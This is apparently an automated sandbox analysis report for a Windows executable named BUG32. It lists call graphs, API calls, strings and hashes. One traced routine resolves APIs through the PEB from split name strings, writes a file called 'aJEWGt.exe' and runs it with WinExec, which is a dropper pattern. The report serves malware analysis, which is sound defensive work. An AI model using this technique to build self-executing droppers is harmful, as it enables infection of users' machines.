6065->6066 6067 408934 sprintf 6066->6067 6069 408963 6067->6069 6070 40896a memset RegisterClassA 6067->6070 6069->6070 6072 4089c4 AdjustWindowRectEx 6070->6072 6073 408a4d CreateWindowExA 6072->6073 6075 408aa2 6073->6075 6076 408b96 UnregisterClassA 6073->6076 6083 408ab4 6075->6083 6086 4093f6 GetWindowRect 6075->6086 6077 40c3cf 2 API calls 6076->6077 6085 4014b0 6077->6085 6079 408af3 HeapAlloc CreateAcceleratorTableA 6080 408b76 SetPropA 6079->6080 6081 408b6f 6079->6081 6080->6085 6095 40dada 6081->6095 6082 408aea ShowWindow 6082->6079 6083->6079 6083->6082 6085->5648 6087 409420 GetSystemMetrics 6086->6087 6088 40944c 6086->6088 6089 409430 GetSystemMetrics 6087->6089 6090 40942e 6087->6090 6091 409441 SetWindowPos 6088->6091 6092 409463 GetWindowRect 6088->6092 6093 409459 GetActiveWindow 6088->6093 6089->6091 6090->6089 6091->6083 6092->6091 6093->6091 6093->6092 6096 40daed 6095->6096 6097 40db0c sprintf 6096->6097 6105 40db78 6096->6105 6098 40db30 GetPropA 6097->6098 6099 40db54 GetPropA 6097->6099 6098->6099 6100 40db63 6099->6100 6101 40db95 6099->6101 6102 40db6a HeapFree 6100->6102 6100->6105 6103 40dba0 HeapAlloc 6101->6103 6104 40dbbc 6101->6104 6102->6105 6106 40dbbf HeapAlloc SetPropA SetWindowLongA 6103->6106 6104->6106 6105->6080 6106->6105 6108 407cbc 6107->6108 6109 407d29 CreateWindowExA 6108->6109 6110 407ccc memset 6108->6110 6112 407d77 6109->6112 6113 4014d4 6109->6113 6110->6109 6114 40c325 3 API calls 6112->6114 6113->5651 6115 407d85 6114->6115 6117 4084cd 6115->6117 6118 4084df 6117->6118 6119 4084ee SetWindowLongA SetWindowLongA SetPropA SendMessageA 6118->6119 6120 40853f 6119->6120 6120->6113 6122 4081ce 6121->6122 6123 4081e0 memset 6122->6123 6124 408221 CreateWindowExA 6122->6124 6123->6124 6126 408265 6124->6126 6130 40151f 6124->6130 6127 40c325 3 API calls 6126->6127 6128 408273 6127->6128 6129 4084cd 4 API calls 6128->6129 6129->6130 6130->5664 6132 408d12 6131->6132 6148 40aec3 6132->6148 6135 408d32 PeekMessageA 6137 408d83 GetActiveWindow 6135->6137 6138 408d44 6135->6138 6136 408d79 GetMessageA 6136->6137 6166 4096c1 GetFocus 6137->6166 6139 408d50 MsgWaitForMultipleObjects 6138->6139 6140 408d1f 6138->6140 6139->6140 6142 408d68 PeekMessageA 6139->6142 6140->5181 6142->6137 6142->6140 6143 408d91 6144 408db3 TranslateMessage DispatchMessageA 6143->6144 6145 408d95 TranslateAcceleratorA 6143->6145 6144->6140 6145->6144 6146 408da5 6145->6146 6146->6140 6185 40967a SendMessageA 6146->6185 6149 40aed1 6148->6149 6150 40aee0 EnterCriticalSection 6149->6150 6153 40aeeb 6149->6153 6150->6153 6151 408d19 6151->6135 6151->6136 6151->6140 6152 40afac LeaveCriticalSection 6152->6151 6154 40c72a 3 API calls 6153->6154 6165 40afa1 6153->6165 6155 40af51 6154->6155 6155->6165 6189 40acda sprintf 6155->6189 6158 40acda 4 API calls 6159 40af77 6158->6159 6160 40acda 4 API calls 6159->6160 6161 40af84 6160->6161 6162 40acda 4 API calls 6161->6162 6163 40af8f 6162->6163 6164 40acda 4 API calls 6163->6164 6164->6165 6165->6151 6165->6152 6167 4096db GetKeyState 6166->6167 6168 40973d 6166->6168 6167->6168 6169 4096e3 GetKeyState 6167->6169 6170 409766 6168->6170 6171 409746 GetKeyState 6168->6171 6169->6168 6172 4096eb GetKeyState 6169->6172 6175 409770 GetPropA 6170->6175 6176 40977c GetPropA 6170->6176 6173 40975e 6171->6173 6174 40974e GetKeyState 6171->6174 6172->6168 6178 4096f3 GetKeyState 6172->6178 6180 40967a 2 API calls 6173->6180 6174->6173 6179 409756 GetKeyState 6174->6179 6175->6176 6184 409736 6175->6184 6177 40978a GetWindowThreadProcessId 6176->6177 6176->6184 6181 40979a GetCurrentProcessId 6177->6181 6177->6184 6178->6168 6182 4096fb GetClassNameA strncmp 6178->6182 6179->6170 6179->6173 6180->6170 6181->6184 6182->6168 6183 409721 SendMessageA 6182->6183 6183->6168 6183->6184 6184->6143 6186 409698 6185->6186 6187 4096bb 6186->6187 6188 4096b1 SendMessageA 6186->6188 6187->6140 6188->6187 6192 40b243 6189->6192 6193 40b24c 6192->6193 6194 40b262 6193->6194 6197 40b29d 6193->6197 6201 40b5af 6194->6201 6196 40b267 6199 40ad0c 6196->6199 6200 40b277 _stricmp 6196->6200 6198 40b2b2 strcmp 6197->6198 6197->6199 6198->6197 6198->6199 6199->6158 6200->6196 6200->6199 6202 40b5c2 tolower 6201->6202 6203 40b5d0 6202->6203 6204 40b5b9 6202->6204 6203->6196 6204->6202 6208 40b052 6205->6208 6206 40887c 6209 40b092 6206->6209 6207 40c72a 3 API calls 6207->6208 6208->6206 6208->6207 6211 40b09d 6209->6211 6210 408884 6210->5705 6211->6210 6213 40b2e3 6211->6213 6214 40b346 6213->6214 6215 40b2ef 6213->6215 6214->6211 6216 40b31b HeapFree 6215->6216 6217 40b32c 6215->6217 6216->6217 6218 40b33d 6217->6218 6219 40d72a HeapFree 6217->6219 6220 40c72a 3 API calls 6218->6220 6219->6218 6220->6214 6222 40c280 6221->6222 6223 40c313 memset 6222->6223 6223->5709 6225 402008 6224->6225 6225->6225 6226 404060 2 API calls 6225->6226 6227 402021 6226->6227 6228 40cabd 4 API calls 6227->6228 6229 40203f 6228->6229 6230 40cabd 4 API calls 6229->6230 6231 40205d 6230->6231 6232 40cf60 HeapFree 6231->6232 6233 4022a5 6232->6233 6234 40cbe5 2 API calls 6233->6234 6235 4022af 6234->6235 6236 40cbe5 2 API calls 6235->6236 6237 4022b8 6236->6237 6237->5724 6239 40a358 6238->6239 6241 40a373 6238->6241 6240 40a360 HeapReAlloc 6239->6240 6239->6241 6240->5725 6241->5725 6792 40c482 InitializeCriticalSection 6793 40a004 6794 40a062 malloc 6793->6794 6795 40a02a malloc 6793->6795 6796 40a076 6794->6796 6797 40a0af 6794->6797 6795->6797 6798 40a03e 6795->6798 6799 409ec2 10 API calls 6796->6799 6807 409d89 6798->6807 6802 40a08a 6799->6802 6804 409d89 10 API calls 6802->6804 6806 40a09d free 6804->6806 6806->6797 6817 409b30 6807->6817 6809 409ebd 6812 409ec2 6809->6812 6811 409da5 6811->6809 6811->6811 6832 409d4a 6811->6832 6813 409b30 9 API calls 6812->6813 6816 409ed9 6813->6816 6814 40a001 6814->6806 6815 409d4a free 6815->6814 6816->6814 6816->6815 6818 409b47 6817->6818 6819 409b8c ceil 6818->6819 6836 40d820 6819->6836 6822 409bbf 6823 409bc3 malloc 6822->6823 6823->6823 6829 409bd8 6823->6829 6824 409d42 6824->6811 6825 409bfa floor 6825->6829 6826 409c2b floor 6826->6829 6827 409c41 ceil 6827->6829 6828 409c66 ceil 6828->6829 6829->6824 6829->6825 6829->6826 6829->6827 6829->6828 6830 409cbf fabs 6829->6830 6838 409ac7 fabs 6829->6838 6830->6829 6833 409d51 6832->6833 6834 409d64 6832->6834 6835 409d56 free 6833->6835 6835->6834 6835->6835 6837 409b9e malloc 6836->6837 6837->6822 6837->6829 6839 409ae2 6838->6839 6839->6829 6840 40250a 6841 40250c 6840->6841 6842 40cf60 HeapFree 6841->6842 6843 402515 6842->6843 6844 408410 GetWindowLongA 6845 4084b7 DefWindowProcA 6844->6845 6846 40842c 6844->6846 6847 4084b1 6845->6847 6848 408439 CallWindowProcA 6846->6848 6848->6847 6849 40845a RemovePropA RemovePropA 6848->6849 6851 408481 RevokeDragDrop 6849->6851 6852 408488 SetWindowLongA 6849->6852 6851->6852 6856 40afcb 6852->6856 6855 40c3cf 2 API calls 6855->6847 6858 40afd7 6856->6858 6857 4084a2 6857->6855 6858->6857 6859 40c72a 3 API calls 6858->6859 6859->6858 6860 40da11 sprintf GetPropA 6861 40dac2 DefWindowProcA 6860->6861 6865 40da45 6860->6865 6862 40dad4 6861->6862 6863 40daa6 6863->6861 6864 40daab CallWindowProcA 6863->6864 6864->6862 6865->6863 6866 40da84 HeapFree 6865->6866 6867 40da8e HeapFree RemovePropA 6865->6867 6866->6867 6867->6863 6868 407e96 6869 407ea1 SendMessageA 6868->6869 6870 407e9d 6868->6870 6869->6870 6275 40b899 6276 40b831 6275->6276 6276->6276 6277 40b995 RtlFreeHeap 6276->6277 6279 40b86d ReadFile 6276->6279 6278 40b9a5 FindCloseChangeNotification 6277->6278 6280 40b9ad 6278->6280 6279->6276 6871 40229b 6872 40229d 6871->6872 6873 40cf60 HeapFree 6872->6873 6874 4022a5 6873->6874 6875 40cbe5 2 API calls 6874->6875 6876 4022af 6875->6876 6877 40cbe5 2 API calls 6876->6877 6878 4022b8 6877->6878 6879 40951c IsWindowEnabled 6880 409530 IsWindowVisible 6879->6880 6881 409567 6879->6881 6880->6881 6882 40953b GetWindowLongA 6880->6882 6882->6881 6883 40954b 6882->6883 6883->6881 6884 40955b SetFocus 6883->6884 6884->6881 6885 40991c GetObjectA 6886 409947 6885->6886 6887 40993f 6885->6887 6887->6886 6888 409951 CreateCompatibleDC 6887->6888 6888->6886 6889 409965 6888->6889 6890 409972 HeapAlloc 6889->6890 6891 4099d7 DeleteDC 6890->6891 6892 40998a GetDIBits 6890->6892 6891->6886 6892->6891 6893 4099c7 HeapFree 6892->6893 6893->6891 6894 40809f 6895 4080a8 SendMessageA 6894->6895 6897 40a720 6898 40c325 3 API calls 6897->6898 6899 40a735 6898->6899 6900 40a740 CreateFileA 6899->6900 6901 40a76e 6899->6901 6904 40a806 6900->6904 6903 40a773 CreateFileA 6901->6903 6909 40a7a9 6901->6909 6903->6904 6905 40a80f 6904->6905 6908 40a834 6904->6908 6907 40a823 6905->6907 6911 40c3cf 2 API calls 6905->6911 6912 40a857 6908->6912 6914 40a844 HeapAlloc 6908->6914 6909->6904 6910 40a7c4 CreateFileA 6909->6910 6910->6904 6913 40a7e9 CreateFileA 6910->6913 6911->6907 6915 40a885 6912->6915 6916 40a87b SetFilePointer 6912->6916 6913->6904 6914->6912 6916->6915 6917 407aab HeapFree 6242 70f000 6244 70f044 GetPEB 6242->6244 6246 70f077 CreateFileA 6244->6246 6247 70f265 6246->6247 6248 70f22d 6246->6248 6249 70f246 WriteFile 6248->6249 6250 70f244 6248->6250 6251 70f255 FindCloseChangeNotification WinExec 6249->6251 6250->6251 6251->6247 6919 40bab0 6920 40bac3 6919->6920 6921 40bab4 memset 6919->6921 6921->6920 6922 40a0b5 6923 40a0cc 6922->6923 6924 40a0bf 6922->6924 6923->6924 6925 40a0df GetObjectType 6923->6925 6926 40a0f6 DestroyIcon 6925->6926 6927 40a0ee DeleteObject 6925->6927 6928 40a0fc 6926->6928 6927->6928 6929 40c3cf 2 API calls 6928->6929 6929->6924 6930 402bb6 6931 402bb8 6930->6931 6932 40cf60 HeapFree 6931->6932 6933 402bc0 6932->6933 6934 40cf60 HeapFree 6933->6934 6935 402bc9 6934->6935 6936 40cf60 HeapFree 6935->6936 6937 402bd2 6936->6937 6938 40cf60 HeapFree 6937->6938 6939 402bdb 6938->6939 6940 40cf60 HeapFree 6939->6940 6941 402be4 6940->6941 6942 40cf60 HeapFree 6941->6942 6943 402bed 6942->6943 6944 40cf60 HeapFree 6943->6944 6945 402bf6 6944->6945 6946 40cf60 HeapFree 6945->6946 6947 402bff 6946->6947 6948 4094b7 IsWindowEnabled 6949 40950d 6948->6949 6950 4094cb IsWindowVisible 6948->6950 6950->6949 6951 4094d6 GetWindowLongA 6950->6951 6951->6949 6952 4094e6 6951->6952 6953 4094f1 SetFocus 6952->6953 6954 4094fc 6952->6954 6953->6949 6954->6949 6955 409502 SetFocus 6954->6955 6955->6949 6956 407eb9 6957 407ee0 6956->6957 6958 407ec2 SendMessageA 6956->6958 6958->6957

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 383 70f044-70f074 GetPEB 384 70f077-70f09a 383->384 385 70f09d-70f0a0 384->385 386 70f0a6-70f0bc 385->386 387 70f1ee-70f22b CreateFileA 385->387 388 70f110-70f116 386->388 389 70f0be-70f0c5 386->389 408 70f265-70f269 387->408 409 70f22d-70f230 387->409 392 70f118-70f11f 388->392 393 70f129-70f12f 388->393 389->388 390 70f0c7-70f0ce 389->390 390->388 394 70f0d0-70f0d7 390->394 392->393 395 70f121-70f124 392->395 396 70f131-70f138 393->396 397 70f148-70f14e 393->397 394->388 398 70f0d9-70f0dd 394->398 400 70f1bb-70f1c0 395->400 396->397 401 70f13a-70f141 396->401 402 70f150-70f157 397->402 403 70f167-70f16f 397->403 398->388 405 70f0df-70f0e3 398->405 411 70f1e0-70f1e9 400->411 412 70f1c2-70f1c5 400->412 401->397 410 70f143-70f146 401->410 402->403 404 70f159-70f160 402->404 406 70f171-70f178 403->406 407 70f188-70f18e 403->407 404->403 413 70f162-70f165 404->413 405->400 414 70f0e9-70f10b 405->414 406->407 415 70f17a-70f181 406->415 416 70f190-70f197 407->416 417 70f1a7-70f1ad 407->417 418 70f232-70f238 409->418 410->400 411->385 412->411 419 70f1c7-70f1ca 412->419 413->400 414->384 415->407 421 70f183-70f186 415->421 416->417 422 70f199-70f1a0 416->422 417->400 423 70f1af-70f1b6 417->423 424 70f246-70f252 WriteFile 418->424 425 70f23a-70f242 418->425 419->411 420 70f1cc-70f1cf 419->420 420->411 426 70f1d1-70f1d4 420->426 421->400 422->417 428 70f1a2-70f1a5 422->428 423->400 429 70f1b8 423->429 431 70f255-70f262 FindCloseChangeNotification WinExec 424->431 425->418 430 70f244 425->430 426->411 432 70f1d6-70f1d9 426->432 428->400 429->400 430->431 431->408 432->411 433 70f1db-70f1de 432->433 433->387 433->411
                            APIs
                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0070F223
                            • WriteFile.KERNELBASE(00000000,FFCF1D8F,00003E00,?,00000000), ref: 0070F252
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0070F256
                            • WinExec.KERNEL32(?,00000005), ref: 0070F262
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                            • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$aJEWGt.exe$athA$catA$dleA$el32$lstr$odul
                            • API String ID: 2234911746-1954830902
                            • Opcode ID: 9037fd845a36f6d2a87649a042e4918916d3473cd9be9bb1307da44f95738cf8
                            • Instruction ID: e5b289e503b9c6e5c78c99d8b575a5c3dc82f1d266eb7223aab96a87c348a898
                            • Opcode Fuzzy Hash: 9037fd845a36f6d2a87649a042e4918916d3473cd9be9bb1307da44f95738cf8
                            • Instruction Fuzzy Hash: B761F575D0121ADBCF34CF94C884AADF7B4BF48715F2582BAD505ABA81C3789E81CB91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 465 40b7a0-40b7b8 466 40b9ae-40b9b7 465->466 467 40b7be-40b7df CreateFileA 465->467 468 40b7e5-40b7fc RtlAllocateHeap 467->468 469 40b9ad 467->469 470 40b802-40b806 468->470 471 40b9a5-40b9ac FindCloseChangeNotification 468->471 469->466 472 40b821-40b82f 470->472 473 40b808-40b80c 470->473 471->469 474 40b835-40b854 472->474 475 40b812-40b81b SetFilePointer 473->475 476 40b80e-40b810 473->476 477 40b856-40b85b 474->477 478 40b86d-40b88c ReadFile 474->478 475->472 476->472 476->475 477->478 479 40b85d 477->479 480 40b892-40b897 478->480 481 40b96c-40b96e 478->481 484 40b865-40b869 479->484 485 40b85f-40b863 479->485 486 40b8a0-40b962 480->486 482 40b970-40b987 481->482 483 40b989-40b98f 481->483 482->482 482->483 487 40b831 483->487 488 40b995-40b99f RtlFreeHeap 483->488 484->478 485->478 485->484 486->486 489 40b968 486->489 487->474 488->471 489->481
                            APIs
                            • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040B7D0
                            • RtlAllocateHeap.NTDLL(00C40000,00000000,00080000,00C44990), ref: 0040B7F2
                            • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 0040B81B
                            • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 0040B87B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040B9A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: File$AllocateChangeCloseCreateFindHeapNotificationPointerRead
                            • String ID:
                            • API String ID: 2374015275-0
                            • Opcode ID: 5462fec5762cf8f925c73772d6ece9c2b0543e0c4986aa33f373e3c923db5140
                            • Instruction ID: 9354a6bab5d441ae6b6cefe42be8c7296906cf017122eb1435a6ebac65db24f0
                            • Opcode Fuzzy Hash: 5462fec5762cf8f925c73772d6ece9c2b0543e0c4986aa33f373e3c923db5140
                            • Instruction Fuzzy Hash: 8B5123729142705AD3189F65CC95B3B77A8EB85305F1A493EFA82B32A1C738DC01C799

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 490 409881-4098a1 LoadLibraryA 491 4098a3-4098af GetProcAddress 490->491 492 4098b4-4098d1 GetVersionExA 490->492 491->492 493 4098f2-4098f8 492->493 494 4098d3-4098d7 492->494 495 409909-40990e 493->495 496 4098fa-409901 call 4097c8 493->496 497 409903 494->497 498 4098d9-4098dd 494->498 496->495 496->497 497->495 498->493 500 4098df-4098e3 498->500 500->497 501 4098e5 500->501 501->493 503 4098e7-4098ea 501->503 503->493 504 4098ec 503->504 504->493
                            APIs
                            • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00409892
                            • GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 004098A9
                            • GetVersionExA.KERNEL32(?), ref: 004098C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProcVersion
                            • String ID: AlphaBlend$msimg32.dll
                            • API String ID: 2685220120-3639726679
                            • Opcode ID: 9850266e1bcefc20ea5aa8015a8c4df59a4ea2a468af919a3544ea111690c884
                            • Instruction ID: 6c63e20e074f887891c00e2e12584ba881c6400e73a88025795d23fd81f273cd
                            • Opcode Fuzzy Hash: 9850266e1bcefc20ea5aa8015a8c4df59a4ea2a468af919a3544ea111690c884
                            • Instruction Fuzzy Hash: 24015E71901208AEDB20AF659D4959E77F9FB81305F14853BD420B23A2E3784985CF1A

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1006 40b899 1007 40b8a0-40b962 1006->1007 1007->1007 1008 40b968 1007->1008 1009 40b96c-40b96e 1008->1009 1010 40b970-40b987 1009->1010 1011 40b989-40b98f 1009->1011 1010->1010 1010->1011 1012 40b831-40b854 1011->1012 1013 40b995-40b9ac RtlFreeHeap FindCloseChangeNotification 1011->1013 1016 40b856-40b85b 1012->1016 1017 40b86d-40b88c ReadFile 1012->1017 1018 40b9ad-40b9b7 1013->1018 1016->1017 1019 40b85d 1016->1019 1017->1009 1021 40b892-40b897 1017->1021 1022 40b865-40b869 1019->1022 1023 40b85f-40b863 1019->1023 1021->1007 1022->1017 1023->1017 1023->1022
                            APIs
                            • RtlFreeHeap.NTDLL(00C40000,00000000,00000000), ref: 0040B99F
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040B9A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: ChangeCloseFindFreeHeapNotification
                            • String ID:
                            • API String ID: 1642550653-0
                            • Opcode ID: 2496689839e21e0a68d3ffad2deadfa62b7342ed64cb4d5310bf82f8007f108b
                            • Instruction ID: 77ba50e03c0feca4c568193139f802c8cba8082c102502968dcf5592b44bbce1
                            • Opcode Fuzzy Hash: 2496689839e21e0a68d3ffad2deadfa62b7342ed64cb4d5310bf82f8007f108b
                            • Instruction Fuzzy Hash: 5C21D133C604B145E31C9B658C2A63677A0DF4630AF4F457EEEC7771A2866CD811D798

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 401000-4011c2 memset GetModuleHandleA HeapCreate call 404000 call 40cdd0 call 40cbbc call 40b0c3 call 40abf3 call 40a700 call 40a389 call 40a1c0 call 40a1a2 call 40a119 call 409881 call 4088b0 call 407ac1 call 407786 call 407301 call 406f79 call 4077a5 call 4076f4 call 40cabd call 40b0e2 call 4077a5 call 4076f4 call 404068 * 10 call 40866f 67 4011c4-401d2d call 406fb0 0->67 68 4011df-40120c call 407510 call 40743f GetModuleHandleA 0->68 76 401d32-401d47 ExitProcess call 40ce20 HeapDestroy ExitProcess 67->76 77 401212 68->77 78 4012e4-4012f6 call 402c3b 68->78 81 40121c-401229 77->81 85 4012f8-401341 call 4023ee call 402c3b 78->85 86 40130f-40132a call 406fb0 78->86 81->78 84 40122f-40125d call 4073f1 call 40ce50 call 40ced0 81->84 100 40126b-401274 84->100 101 40125f-401269 84->101 102 401343-40139a call 40a1f0 call 40ce50 call 402c3b 85->102 103 401368-401383 call 406fb0 85->103 86->76 106 401276-40129b call 40cf00 call 40ce50 100->106 107 40129d-4012d3 PathQuoteSpacesA call 40cf00 * 3 call 40ce50 100->107 105 4012d8-4012de 101->105 127 4013bc-4013d7 call 406fb0 102->127 128 40139c-4013ee call 402c3b 102->128 103->76 105->78 105->81 106->105 107->105 127->76 134 4013f0-401409 128->134 135 40140e-401420 call 402c3b 128->135 134->135 138 401440-401452 call 402c3b 135->138 139 401422-40143b 135->139 142 4016d8-40170d call 40a1f0 call 40ce50 call 402c3b 138->142 143 401458-401465 call 40ced0 138->143 139->138 161 401713-40175d call 4073f1 call 40a1f0 call 40ced0 142->161 162 40188a-401969 call 40cf00 * 3 call 40ce50 call 404100 call 40ce50 call 40cf00 * 2 GetTempFileNameA call 40a48b PathRenameExtensionA call 40cf00 call 40ce50 call 40a8a0 142->162 148 401487-401538 call 408bc0 call 407da3 call 407f7c call 408289 call 408be3 call 4082a9 143->148 149 401467-401482 call 40cf00 call 40ce50 143->149 197 40153d-40154b call 408de7 148->197 164 4015fb-401652 call 4040d0 call 40b6a0 call 40a1f0 call 40ced0 149->164 190 401771 161->190 191 40175f-401768 161->191 275 40196b-4019d5 call 40aa20 call 40a680 call 40ced0 162->275 276 40198d-4019c3 call 40a48b call 402ffb call 406fb0 RemoveDirectoryA 162->276 202 401654-40167a call 406fb0 RemoveDirectoryA 164->202 203 40167f-401691 call 402c3b 164->203 196 401773-401775 190->196 191->190 195 40176a-40176f 191->195 195->196 196->162 200 40177b-4017c2 call 40a395 call 407023 call 40ce50 call 40ced0 196->200 208 401567-40156f 197->208 209 40154d-40155d RemoveDirectoryA 197->209 247 4017c4-4017f7 call 40cf00 call 40ce50 call 40a3d5 call 40ced0 200->247 248 401838-401885 call 407452 call 40a3e7 call 40a3d5 RemoveDirectoryA 200->248 202->76 221 401693-401698 203->221 222 40169d-4016d3 call 402d4e 203->222 214 401571-40157f call 40acbc 208->214 215 4015af-4015b7 208->215 209->76 233 401581-4015aa call 4082e4 call 40ce50 call 408783 214->233 234 4015ac-4015ad 214->234 224 4015f5-4015f6 215->224 225 4015b9-4015c7 call 40accb 215->225 221->222 222->142 224->197 237 4015f4 225->237 238 4015c9-4015f2 call 4082e4 call 40ce50 call 408783 225->238 233->164 234->224 237->224 238->164 282 401804-401816 call 40a8a0 247->282 283 4017f9-4017ff call 40251c 247->283 248->76 301 4019e2-401b91 call 404100 call 40ce50 call 407452 GetShortPathNameA call 407452 call 4074ad call 407452 call 40a541 call 4074ad call 407452 call 40a3e7 call 4074ad call 404200 call 4074ad * 2 call 404390 call 4074ad PathQuoteSpacesA call 402c07 275->301 302 4019d7-4019dd call 40251c 275->302 276->76 282->248 293 401818-401833 call 40aa20 call 40a680 282->293 283->282 293->248 338 401b93-401b9d call 40866f 301->338 339 401ba6 301->339 302->301 338->339 345 401b9f-401ba4 338->345 340 401ba8-401baa 339->340 342 401c15-401c47 call 404100 call 40ce50 GetSystemDirectoryA PathAddBackslashA 340->342 343 401bac-401c13 call 404100 call 40ce50 GetWindowsDirectoryA PathAddBackslashA call 40cf00 * 2 call 40ce50 PathAddBackslashA 340->343 354 401c4c-401d2b call 40cf00 * 5 call 40230c call 402ffb PathUnquoteSpacesA call 40a48b call 407452 call 40a3e7 call 40a3d5 RemoveDirectoryA 342->354 343->354 345->340 354->76
                            APIs
                            • memset.MSVCRT ref: 0040100F
                            • GetModuleHandleA.KERNEL32(00000000), ref: 0040101C
                            • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                              • Part of subcall function 0040CDD0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401049,00000000,00001000,00000000,00000000), ref: 0040CDDC
                              • Part of subcall function 0040CDD0: HeapAlloc.KERNEL32(026C0000,00000000,00004104,?,00401049,00000000,00001000,00000000,00000000), ref: 0040CE0A
                              • Part of subcall function 0040ABF3: memset.MSVCRT ref: 0040AC04
                              • Part of subcall function 0040ABF3: RegisterClassA.USER32(?), ref: 0040AC3E
                              • Part of subcall function 0040ABF3: CreateWindowExA.USER32(00000000,PostEventClass,00000000,00C00000,00000000,00000000,00000001,00000001,00000000,00000000,00000000), ref: 0040AC5B
                              • Part of subcall function 0040ABF3: RegisterWindowMessageA.USER32(PB_PostEventMessage), ref: 0040AC6B
                              • Part of subcall function 0040ABF3: InitializeCriticalSection.KERNEL32(00410764,00000000,004105D0,00000400,00000028,0040ABCA,0040ABE7), ref: 0040ACB4
                              • Part of subcall function 0040A389: TlsAlloc.KERNEL32(00401062,00000000,00001000,00000000,00000000), ref: 0040A389
